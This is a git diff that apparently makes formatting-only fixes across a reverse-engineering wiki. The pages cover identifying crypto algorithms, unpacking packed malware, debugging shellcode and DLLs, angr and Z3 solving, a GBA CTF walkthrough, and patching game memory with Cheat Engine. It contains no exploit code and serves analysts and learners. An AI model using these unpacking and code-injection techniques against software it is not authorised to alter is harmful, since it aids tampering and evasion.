+* **EAT** (**Export Address Table**) Hooks. This hooks can be done from **userland**. The goal is to hook exported functions by DLLs.
 * **Inline Hooks**: This type are difficult to achieve. This involve modifying the code of the functions itself. Maybe by putting a jump at the begging of this.
diff --git a/reversing/cryptographic-algorithms/README.md b/reversing/cryptographic-algorithms/README.md
index f084c600..521e22d6 100644
--- a/reversing/cryptographic-algorithms/README.md
+++ b/reversing/cryptographic-algorithms/README.md
@@ -2,7 +2,7 @@
 
 ## Identifying Algorithms
 
-If you ends in a code** using shift rights and lefts, xors and several arithmetic operations** it's highly possible that it's the implementation of a **cryptographic algorithm**. Here it's going to be showed some ways to **identify the algorithm that it's used without needing to reverse each step**.
+If you ends in a code **using shift rights and lefts, xors and several arithmetic operations** it's highly possible that it's the implementation of a **cryptographic algorithm**. Here it's going to be showed some ways to **identify the algorithm that it's used without needing to reverse each step**.
 
 ### API functions
 
@@ -20,7 +20,7 @@ Compresses and decompresses a given buffer of data.
 
 #### CryptAcquireContext
 
- The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI **functions that use the selected CSP.
+&#x20;The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP.
 
 #### CryptCreateHash
 
@@ -60,8 +60,8 @@ In this case, if you look for **0xA56363C6** you can find that it's related to t
 It's composed of 3 main parts:
 
 * **Initialization stage/**: Creates a **table of values from 0x00 to 0xFF** (256bytes in total, 0x100). This table is commonly call **Substitution Box** (or SBox).
-* **Scrambling stage**: Will **loop through the table** crated before (loop of 0x100 iterations, again) creating modifying each value with **semi-random** bytes. In order to create this semi-random bytes, the RC4 **key is used**. RC4 **keys **can be **between 1 and 256 bytes in length**, however it is usually recommended that it is above 5 bytes. Commonly, RC4 keys are 16 bytes in length.
-* **XOR stage**: Finally, the plain-text or cyphertext is** XORed with the values created before**. The function to encrypt and decrypt is the same. For this, a **loop through the created 256 bytes** will be performed as many times as necessary. This is usually recognized in a decompiled code with a **%256 (mod 256)**.
+* **Scrambling stage**: Will **loop through the table** crated before (loop of 0x100 iterations, again) creating modifying each value with **semi-random** bytes. In order to create this semi-random bytes, the RC4 **key is used**. RC4 **keys** can be **between 1 and 256 bytes in length**, however it is usually recommended that it is above 5 bytes. Commonly, RC4 keys are 16 bytes in length.
+* **XOR stage**: Finally, the plain-text or cyphertext is **XORed with the values created before**. The function to encrypt and decrypt is the same. For this, a **loop through the created 256 bytes** will be performed as many times as necessary. This is usually recognized in a decompiled code with a **%256 (mod 256)**.
 
 {% hint style="info" %}
 **In order to identify a RC4 in a disassembly/decompiled code you can check for 2 loops of size 0x100 (with the use of a key) and then a XOR of the input data with the 256 values created before in the 2 loops probably using a %256 (mod 256)**
@@ -84,8 +84,8 @@ It's composed of 3 main parts:
 ### **Characteristics**
 
 * Use of **substitution boxes and lookup tables**
-  * It's possible to **distinguish AES thanks to the use of specific lookup table values** (constants). _Note that the **constant **can be **stored **in the binary **or created** **dynamically**._
-* The **encryption key** must be **divisible **by **16 **(usually 32B) and usually an **IV **of 16B is used.
+  * It's possible to **distinguish AES thanks to the use of specific lookup table values** (constants). _Note that the **constant** can be **stored** in the binary **or created**  **dynamically**._
+* The **encryption key** must be **divisible** by **16** (usually 32B) and usually an **IV** of 16B is used.
 
 ### SBox constants
 
@@ -96,12 +96,12 @@ It's composed of 3 main parts:
 ### Characteristics
 
 * It's rare to find some malware using it but there are examples (Ursnif)
-* Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function) 
+* Simple to determine if an algorithm is Serpent or not based on it's length (extremely long function)&#x20;
 
 ### Identifying
 
-In the following image notice how the constant **0x9E3779B9** is used (note that this constant is also used by other crypto algorithms like **TEA **-Tiny Encryption Algorithm).\
-Also note the **size of the loop** (**132**) and the **number of XOR operations** in the **disassembly **instructions and in the **code **example:
+In the following image notice how the constant **0x9E3779B9** is used (note that this constant is also used by other crypto algorithms like **TEA** -Tiny Encryption Algorithm).\
+Also note the **size of the loop** (**132**) and the **number of XOR operations** in the **disassembly** instructions and in the **code** example:
 
 ![](<../../.gitbook/assets/image (381).png>)
 
@@ -109,7 +109,7 @@ As it was mentioned before, this code can be visualized inside any decompiler as
 
 ![](<../../.gitbook/assets/image (382).png>)
 
-Therefore, it's possible to identify this algorithm checking the **magic number** and the** initial XORs**, seeing a **very long function** and **comparing **some **instructions **of the long function **with an implementation** (like the shift left by 7 and the rotate left by 22).
+Therefore, it's possible to identify this algorithm checking the **magic number** and the **initial XORs**, seeing a **very long function** and **comparing** some **instructions** of the long function **with an implementation** (like the shift left by 7 and the rotate left by 22).
 
 ## RSA **(Asymmetric Crypt)**
 
@@ -137,7 +137,7 @@ Therefore, it's possible to identify this algorithm checking the **magic number*
 
 #### Init
 
-You can identify both of them checking the constants. Note that the sha_init has 1 constant that MD5 doesn't have:
+You can identify both of them checking the constants. Note that the sha\_init has 1 constant that MD5 doesn't have:
 
 ![](<../../.gitbook/assets/image (385).png>)
 
diff --git a/reversing/cryptographic-algorithms/unpacking-binaries.md b/reversing/cryptographic-algorithms/unpacking-binaries.md
index 472947be..84c500d9 100644
--- a/reversing/cryptographic-algorithms/unpacking-binaries.md
+++ b/reversing/cryptographic-algorithms/unpacking-binaries.md
@@ -11,12 +11,12 @@
 
 ## Basic Recommendations
 
-* **Start **analysing the packed binary **from the bottom in IDA and move up**. Unpackers exit once the unpacked code exit so it's unlikely that the unpacker passes execution to the unpacked code at the start.
-* Search for **JMP's **or **CALLs **to **registers **or **regions** of **memory**. Also search for **functions pushing arguments and an address direction and then calling `retn`**, because the return of the function in that case may call the address just pushed to the stack before calling it.
-* Put a **breakpoint **on `VirtualAlloc` as this allocates space in memory where the program can write unpacked code. The "run to user code" or use F8 to **get to value inside EAX** after executing the function and "**follow that address in dump**". You never know if that is the region where the unpacked code is going to be saved.
+* **Start** analysing the packed binary **from the bottom in IDA and move up**. Unpackers exit once the unpacked code exit so it's unlikely that the unpacker passes execution to the unpacked code at the start.
+* Search for **JMP's** or **CALLs** to **registers** or **regions** of **memory**. Also search for **functions pushing arguments and an address direction and then calling `retn`**, because the return of the function in that case may call the address just pushed to the stack before calling it.
+* Put a **breakpoint** on `VirtualAlloc` as this allocates space in memory where the program can write unpacked code. The "run to user code" or use F8 to **get to value inside EAX** after executing the function and "**follow that address in dump**". You never know if that is the region where the unpacked code is going to be saved.
   * **`VirtualAlloc`** with the value "**40**" as an argument means Read+Write+Execute (some code that needs execution is going to be copied here).
-* **While unpacking **code it's normal to find **several calls** to** arithmetic operations** and functions like **`memcopy`** or **`Virtual`**`Alloc`. If you find yourself in a function that apparently only perform arithmetic operations and maybe some` memcopy` , the recommendation is to try to **find the end of the function** (maybe a JMP or call to some register) **or **at least the** call to the last function** and run to then as the code isn't interesting.
-* While unpacking code **note **whenever you **change memory region** as a memory region change may indicate the **starting of the unpacking code**. You can easily dump a memory region using Process Hacker (process --> properties --> memory).
+* **While unpacking** code it's normal to find **several calls** to **arithmetic operations** and functions like **`memcopy`** or **`Virtual`**`Alloc`. If you find yourself in a function that apparently only perform arithmetic operations and maybe some `memcopy` , the recommendation is to try to **find the end of the function** (maybe a JMP or call to some register) **or** at least the **call to the last function** and run to then as the code isn't interesting.
+* While unpacking code **note** whenever you **change memory region** as a memory region change may indicate the **starting of the unpacking code**. You can easily dump a memory region using Process Hacker (process --> properties --> memory).
 * While trying to unpack code a good way to **know if you are already working with the unpacked code** (so you can just dump it) is to **check the strings of the binary**. If at some point you perform a jump (maybe changing the memory region) and you notice that **a lot more strings where added**, then you can know **you are working with the unpacked code**.\
   However, if the packer already contains a lot of strings you can see how many strings contains the word "http" and see if this number increases.
 * When you dump an executable from a region of memory you can fix some headers using [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases).
diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md
index 87b28100..e5ea815b 100644
--- a/reversing/reversing-tools-basic-methods/README.md
+++ b/reversing/reversing-tools-basic-methods/README.md
@@ -16,8 +16,8 @@ Software:
 ## .Net decompiler
 
 [https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)\
-[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions **and **search ILSpy**).\
-If you need to **decompile**, **modify **and **recompile **again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\
+[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\
+If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\
 You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/)
 
 ### DNSpy Logging
@@ -61,9 +61,9 @@ Then save the new file on _**File >> Save module...**_:
 
 ![](<../../.gitbook/assets/image (279).png>)
 
-This is necessary because if you don't do this, at **runtime **several **optimisations **will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**.
+This is necessary because if you don't do this, at **runtime** several **optimisations** will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**.
 
-Then, if your .Net application is being **run **by **IIS** you can **restart **it with:
+Then, if your .Net application is being **run** by **IIS** you can **restart** it with:
 
 ```
 iisreset /noforce
@@ -83,7 +83,7 @@ Now that we are debugging the process, it's time to stop it and load all the mod
 
 ![](<../../.gitbook/assets/image (283).png>)
 
-Click any module on **Modules **and selec**t Open All Modules**:
+Click any module on **Modules** and selec**t Open All Modules**:
 
 ![](<../../.gitbook/assets/image (284).png>)
 
@@ -100,26 +100,26 @@ Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
 
 ### Using IDA
 
-* **Load rundll32 **(64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
-* Select **Windbg **debugger
+* **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
+* Select **Windbg** debugger
 * Select "**Suspend on library load/unload**"
 
 ![](<../../.gitbook/assets/image (135).png>)
 
-* Configure the **parameters **of the execution putting the **path to the DLL** and the function that you want to call:
+* Configure the **parameters** of the execution putting the **path to the DLL** and the function that you want to call:
 
 ![](<../../.gitbook/assets/image (136).png>)
 
-Then, when you start debugging** the execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped.
+Then, when you start debugging **the execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped.
 
 But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how.
 
 ### Using x64dbg/x32dbg
 
 * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
-* **Change the Command Line **( _File --> Change Command Line _) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
+* **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
 * Change _Options --> Settings_ and select "**DLL Entry**".
-* Then **start the execution**, the debugger will stop at each dll main, at some point you will** stop in the dll Entry of your dll**. From there, just search for the points where you want to put a breakpoint.
+* Then **start the execution**, the debugger will stop at each dll main, at some point you will **stop in the dll Entry of your dll**. From there, just search for the points where you want to put a breakpoint.
 
 Notice that when the execution is stopped by any reason in win64dbg you can see **in which code you are** looking in the **top of the win64dbg window**:
 
@@ -143,8 +143,8 @@ Then, looking to this ca see when the execution was stopped in the dll you want
 
 ### Debugging a shellcode with blobrunner
 
-[**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate **the **shellcode **inside a space of memory, will **indicate **you the **memory address **were the shellcode was allocated and will **stop **the execution.\
-Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume **the execution. This way you will be debugging the shellcode.
+[**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\
+Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode.
 
 The releases github page contains zips containing the compiled releases: [https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
 You can find a slightly modified version of Blobrunner in the following link. In order to compile it just **create a C/C++ project in Visual Studio Code, copy and paste the code and build it**.
@@ -155,7 +155,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
 
 ### Debugging a shellcode with jmp2it
 
-****[**jmp2it **](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate **the **shellcode **inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger **to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
+****[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
 
 ![](<../../.gitbook/assets/image (397).png>)
 
@@ -181,8 +181,8 @@ You can see the stack for example inside a hex dump:
 
 ### Deobfuscating shellcode and getting executed functions
 
-You should try** **[**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
-It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding **itself in memory.
+You should try **** [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
+It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
 
 ```bash
 scdbg.exe -f shellcode # Get info
@@ -228,7 +228,7 @@ To find the **entry point** search the functions by `::main` like in:
 ![](<../../.gitbook/assets/image (612).png>)
 
 In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\
-Having the **name **of the **functions **being called, search for them on the **Internet **to learn about their **inputs** and **outputs**.
+Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
 
 ## **Delphi**
 
@@ -236,7 +236,7 @@ For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](htt
 
 I you have to reverse a Delphi binary I would suggest you to use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)****
 
-Just press** ATL+f7 **(import python plugin in IDA) and select the python plugin.
+Just press **ATL+f7** (import python plugin in IDA) and select the python plugin.
 
 This plugin will execute the binary and resolve function names dynamically at the start of the debugging. After starting the debugging press again the Start button (the green one or f9) and a breakpoint will hit in the beginning of the real code.
 
@@ -246,7 +246,7 @@ It is also very interesting because if you press a button in the graphic applica
 
 I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
 
-Just press** ATL+f7 **(import python plugin in IDA) and select the python plugin.
+Just press **ATL+f7** (import python plugin in IDA) and select the python plugin.
 
 This will resolve the names of the functions.
 
@@ -260,14 +260,14 @@ In this page you can find how to get the python code from an ELF/EXE python comp
 
 ## GBA - Game Body Advance
 
-If you get the **binary **of a GBA game you can use different tools to **emulate **and **debug **it:
+If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it:
 
 * ****[**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface
-* ****[**mgba **](https://mgba.io)- Contains a CLI debugger
-* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader)** **- Ghidra plugin
-* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA)** **- Ghidra plugin
+* ****[**mgba** ](https://mgba.io)- Contains a CLI debugger
+* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) **** - Ghidra plugin
+* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) **** - Ghidra plugin
 
-In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_** **you can see how to press the Game Boy Advance **buttons**
+In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_** ** you can see how to press the Game Boy Advance **buttons**
 
 ![](<../../.gitbook/assets/image (578).png>)
 
@@ -290,7 +290,7 @@ So, in this kind of programs, the an interesting part will be **how the program
 
 ![](<../../.gitbook/assets/image (579).png>)
 
-In the previous image you can find that the function is called from **FUN\_080015a8 **(addresses: _0x080015fa_ and _0x080017ac_).
+In the previous image you can find that the function is called from **FUN\_080015a8** (addresses: _0x080015fa_ and _0x080017ac_).
 
 In that function, after some init operations (without any importance):
 
@@ -329,7 +329,7 @@ void FUN_080015a8(void)
       if ((uVar1 & DAT_030004da & ~uVar4) != 0) {
 ```
 
-The last if is checking **`uVar4`** is in the **last Keys **and not is the current key, also called letting go off a button (current key is stored in **`uVar1`**).
+The last if is checking **`uVar4`** is in the **last Keys** and not is the current key, also called letting go off a button (current key is stored in **`uVar1`**).
 
 ```c
         if (uVar1 == 4) {
@@ -359,17 +359,17 @@ The last if is checking **`uVar4`** is in the **last Keys **and not is the curre
                 DAT_030000d8 = DAT_030000d8 + 0x3a;
 ```
 
-In the previous code you can see that we are comparing **uVar1 **(the place where the **value of the pressed button** is) with some values:
+In the previous code you can see that we are comparing **uVar1** (the place where the **value of the pressed button** is) with some values:
 
-* First, it's compared with the **value 4** (**SELECT **button): In the challenge this button clears the screen
-* Then, it's comparing it with the **value 8** (**START **button): In the challenge this checks is the code is valid to get the flag.
+* First, it's compared with the **value 4** (**SELECT** button): In the challenge this button clears the screen
+* Then, it's comparing it with the **value 8** (**START** button): In the challenge this checks is the code is valid to get the flag.
   * In this case the var **`DAT_030000d8`** is compared with 0xf3 and if the value is the same some code is executed.
 * In any other cases, some cont (`DAT_030000d4`) is checked. It's a cont because it's adding 1 right after entering in the code. \
-  **I**f less than 8 something that involves **adding **values to **`DAT_030000d8` **is done (basically it's adding the values of the keys pressed in this variable as long as the cont is less than 8).
+  **I**f less than 8 something that involves **adding** values to **`DAT_030000d8` ** is done (basically it's adding the values of the keys pressed in this variable as long as the cont is less than 8).
 
-So, in this challenge, knowing the values of the buttons, you needed to** press a combination with a length smaller than 8 that the resulting addition is 0xf3.**
+So, in this challenge, knowing the values of the buttons, you needed to **press a combination with a length smaller than 8 that the resulting addition is 0xf3.**
 
-**Reference for this tutorial: **[**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)****
+**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)****
 
 ## Game Boy
 
diff --git a/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/reversing/reversing-tools-basic-methods/angr/angr-examples.md
index 61f2db6a..579cdbc4 100644
--- a/reversing/reversing-tools-basic-methods/angr/angr-examples.md
+++ b/reversing/reversing-tools-basic-methods/angr/angr-examples.md
@@ -1,7 +1,7 @@
 # Angr - Examples
 
 {% hint style="info" %}
-If the program is using **`scanf` **to get **several values at once from stdin** you need to generate a state that starts after the **`scanf`**.
+If the program is using **`scanf` ** to get **several values at once from stdin** you need to generate a state that starts after the **`scanf`**.
 {% endhint %}
 
 ### Input to reach address (indicating the address)
@@ -206,7 +206,7 @@ if __name__ == '__main__':
   main(sys.argv)
 ```
 
-In this scenario, the input was taken with` scanf("%u %u")` and the value `"1 1"` was given, so the values **`0x00000001`** of the stack come from the **user input**. You can see how this values starts in `$ebp - 8`. Therefore, in the code we have **subtracted 8 bytes to `$esp` (as in that moment `$ebp` and `$esp` had the same value)** and then we have pushed the BVS.
+In this scenario, the input was taken with `scanf("%u %u")` and the value `"1 1"` was given, so the values **`0x00000001`** of the stack come from the **user input**. You can see how this values starts in `$ebp - 8`. Therefore, in the code we have **subtracted 8 bytes to `$esp` (as in that moment `$ebp` and `$esp` had the same value)** and then we have pushed the BVS.
 
 ![](<../../../.gitbook/assets/image (614).png>)
 
@@ -419,7 +419,7 @@ Note that the symbolic file could also contain constant data merged with symboli
 ### Applying Constrains
 
 {% hint style="info" %}
-Sometimes simple human operations like compare 2 words of length 16 **char by char** (loop), **cost **a lot to a **angr **because it needs to generate branches **exponentially **because it generates 1 branch per if: `2^16`\
+Sometimes simple human operations like compare 2 words of length 16 **char by char** (loop), **cost** a lot to a **angr** because it needs to generate branches **exponentially** because it generates 1 branch per if: `2^16`\
 Therefore, it's easier to **ask angr get to a previous point** (where the real difficult part was already done) and **set those constrains manually**.
 {% endhint %}
 
@@ -504,7 +504,7 @@ Another thing you can do in these scenarios is to **hook the function giving ang
 
 ### Simulation Managers
 
-Some simulation managers can be more useful than others. In the previous example there was a problem as a lot of useful branches were created. Here, the **veritesting **technique will merge those and will find a solution.\
+Some simulation managers can be more useful than others. In the previous example there was a problem as a lot of useful branches were created. Here, the **veritesting** technique will merge those and will find a solution.\
 This simulation manager can also be activated with: `simulation = project.factory.simgr(initial_state, veritesting=True)`
 
 ```python
diff --git a/reversing/reversing-tools-basic-methods/cheat-engine.md b/reversing/reversing-tools-basic-methods/cheat-engine.md
index 87df282d..f310dc64 100644
--- a/reversing/reversing-tools-basic-methods/cheat-engine.md
+++ b/reversing/reversing-tools-basic-methods/cheat-engine.md
@@ -1,18 +1,18 @@
 # Cheat Engine
 
 ****[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them.\
-When you download and run it, you are **presented **with a **tutorial **of how to use the tool. If you want to learn how to use the tool it's highly recommended to complete it.
+When you download and run it, you are **presented** with a **tutorial** of how to use the tool. If you want to learn how to use the tool it's highly recommended to complete it.
 
 ## What are you searching?
 
 ![](<../../.gitbook/assets/image (580).png>)
 
 This tool is very useful to find **where some value** (usually a number) **is stored in the memory** of a program.\
-**Usually numbers **are stored in **4bytes **form, but you could also find them in** double **or **float **formats, or you may want to look for something **different from a number**. For that reason you need to be sure you **select **what you want to **search for**:
+**Usually numbers** are stored in **4bytes** form, but you could also find them in **double** or **float** formats, or you may want to look for something **different from a number**. For that reason you need to be sure you **select** what you want to **search for**:
 
 ![](<../../.gitbook/assets/image (581).png>)
 
-Also you can indicate **different **types of **searches**:
+Also you can indicate **different** types of **searches**:
 
 ![](<../../.gitbook/assets/image (582).png>)
 
@@ -22,13 +22,13 @@ You can also check the box to **stop the game while scanning the memory**:
 
 ### Hotkeys
 
-In _**Edit --> Settings --> Hotkeys**_ you can set different **hotkeys **for different purposes like **stopping **the **game **(which is quiet useful if at some point you want to scan the memory). Other options are available:
+In _**Edit --> Settings --> Hotkeys**_ you can set different **hotkeys** for different purposes like **stopping** the **game** (which is quiet useful if at some point you want to scan the memory). Other options are available:
 
 ![](<../../.gitbook/assets/image (583).png>)
 
 ## Modifying the value
 
-Once you **found **where is the **value **you are **looking for **(more about this in the following steps) you can **modify it** double clicking it, then double clicking its value:
+Once you **found** where is the **value** you are **looking for** (more about this in the following steps) you can **modify it** double clicking it, then double clicking its value:
 
 ![](<../../.gitbook/assets/image (585).png>)
 
@@ -36,7 +36,7 @@ And finally **marking the check** to get the modification done in the memory:
 
 ![](<../../.gitbook/assets/image (586).png>)
 
-The **change **to the **memory **will be immediately **applied **(note that until the game doesn't use this value again the value **won't be updated in the game**).
+The **change** to the **memory** will be immediately **applied** (note that until the game doesn't use this value again the value **won't be updated in the game**).
 
 ## Searching the value
 
@@ -48,22 +48,22 @@ Supposing you are looking for the value 100, you **perform a scan** searching fo
 
 ![](<../../.gitbook/assets/image (587).png>)
 
-Then, you do something so that **value changes**, and you **stop **the game and **perform **a **next scan**:
+Then, you do something so that **value changes**, and you **stop** the game and **perform** a **next scan**:
 
 ![](<../../.gitbook/assets/image (588).png>)
 
-Cheat Engine will search for the **values **that **went from 100 to the new value**. Congrats, you **found **the **address **of the value you were looking for, you can now modify it.\
+Cheat Engine will search for the **values** that **went from 100 to the new value**. Congrats, you **found** the **address** of the value you were looking for, you can now modify it.\
 _If you still have several values, do something to modify again that value, and perform another "next scan" to filter the addresses._
 
 ### Unknown Value, known change
 
-In the scenario you **don't know the value** but you know** how to make it change** (and even the value of the change) you can look for your number.
+In the scenario you **don't know the value** but you know **how to make it change** (and even the value of the change) you can look for your number.
 
 So, start by performing a scan of type "**Unknown initial value**":
 
 ![](<../../.gitbook/assets/image (589).png>)
 
-Then, make the value change, indicate **how **the **value** **changed** (in my case it was decreased by 1)** **and perform a **next scan**:
+Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) **** and perform a **next scan**:
 
 ![](<../../.gitbook/assets/image (590).png>)
 
@@ -73,26 +73,26 @@ You will be presented **all the values that were modified in the selected way**:
 
 Once you have found your value, you can modify it.
 
-Note that there are a** lot of possible changes** and you can do these **steps as much as you want** to filter the results:
+Note that there are a **lot of possible changes** and you can do these **steps as much as you want** to filter the results:
 
 ![](<../../.gitbook/assets/image (592).png>)
 
 ### Random Memory Address - Finding the code
 
-Until know we learnt how to find an address storing a value, but it's highly probably that in **different executions of the game that address is in different places of the memory**. So lets find out how to always find that address. 
+Until know we learnt how to find an address storing a value, but it's highly probably that in **different executions of the game that address is in different places of the memory**. So lets find out how to always find that address.&#x20;
 
-Using some of the mentioned tricks, find the address where your current game is storing the important value. Then (stopping the game if you whish) do a** right click** on the found **address **and select "**Find out what accesses this address**" or "**Find out what writes to this address**":
+Using some of the mentioned tricks, find the address where your current game is storing the important value. Then (stopping the game if you whish) do a **right click** on the found **address** and select "**Find out what accesses this address**" or "**Find out what writes to this address**":
 
 ![](<../../.gitbook/assets/image (593).png>)
 
-The** first option** is useful to know which **parts **of the **code **are **using **this **address **(which is useful for more things like **knowing where you can modify the code** of the game).\
-The **second option **is more **specific**, and will be more helpful in this case as we are interested in knowing **from where this value is being written**.
+The **first option** is useful to know which **parts** of the **code** are **using** this **address** (which is useful for more things like **knowing where you can modify the code** of the game).\
+The **second option** is more **specific**, and will be more helpful in this case as we are interested in knowing **from where this value is being written**.
 
-Once you have selected one of those options, the **debugger **will be **attached **to the program and a new **empty window **will appear. Now, **play **the **game **and **modify **that **value **(without restarting the game). The **window **should be **filled **with the **addresses **that are **modifying **the **value**:
+Once you have selected one of those options, the **debugger** will be **attached** to the program and a new **empty window** will appear. Now, **play** the **game** and **modify** that **value** (without restarting the game). The **window** should be **filled** with the **addresses** that are **modifying** the **value**:
 
 ![](<../../.gitbook/assets/image (594).png>)
 
-Now that you found the address it's modifying the value you can** modify the code at your pleasure** (Cheat Engine allows you to modify it for NOPs real quick):
+Now that you found the address it's modifying the value you can **modify the code at your pleasure** (Cheat Engine allows you to modify it for NOPs real quick):
 
 ![](<../../.gitbook/assets/image (595).png>)
 
@@ -148,7 +148,7 @@ A template will be generated:
 
 ![](<../../.gitbook/assets/image (604).png>)
 
-So, insert your new assembly code in the "**newmem**" section and remove the original code from the "**originalcode**" if you don't want it to be executed**. **In this example the injected code will add 2 points instead of substracting 1:
+So, insert your new assembly code in the "**newmem**" section and remove the original code from the "**originalcode**" if you don't want it to be executed**.** In this example the injected code will add 2 points instead of substracting 1:
 
 ![](<../../.gitbook/assets/image (605).png>)
 
diff --git a/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
index 1676b44c..78099494 100644
--- a/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
+++ b/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
@@ -80,7 +80,7 @@ print(simplify(a == b)) #This is False
 
 ### Signed/Unsigned Numbers
 
-Z3 provides special signed versions of arithmetical operations where it makes a difference whether the **bit-vector is treated as signed or unsigned**. In Z3Py, the operators **<, <=, >, >=, /, % and >>** correspond to the **signed **versions. The corresponding **unsigned **operators are **ULT, ULE, UGT, UGE, UDiv, URem and LShR.**
+Z3 provides special signed versions of arithmetical operations where it makes a difference whether the **bit-vector is treated as signed or unsigned**. In Z3Py, the operators **<, <=, >, >=, /, % and >>** correspond to the **signed** versions. The corresponding **unsigned** operators are **ULT, ULE, UGT, UGE, UDiv, URem and LShR.**
 
 ```python
 from z3 import *
@@ -102,7 +102,7 @@ solve(ULT(x, 0))
 
 ### Functions
 
-**Interpreted functio**ns such as arithmetic where the **function +** has a **fixed standard interpretation** (it adds two numbers). **Uninterpreted functions **and constants are **maximally flexible**; they allow **any interpretation **that is **consistent **with the **constraints **over the function or constant.
+**Interpreted functio**ns such as arithmetic where the **function +** has a **fixed standard interpretation** (it adds two numbers). **Uninterpreted functions** and constants are **maximally flexible**; they allow **any interpretation** that is **consistent** with the **constraints** over the function or constant.
 
 Example: f applied twice to x results in x again, but f applied once to x is different from x.
 
diff --git a/reversing/word-macros.md b/reversing/word-macros.md
index f2cf36bb..20bb3003 100644
--- a/reversing/word-macros.md
+++ b/reversing/word-macros.md
@@ -9,6 +9,6 @@ For example, in the following image you can see that and If that is never going
 
 ### Macro Forms
 
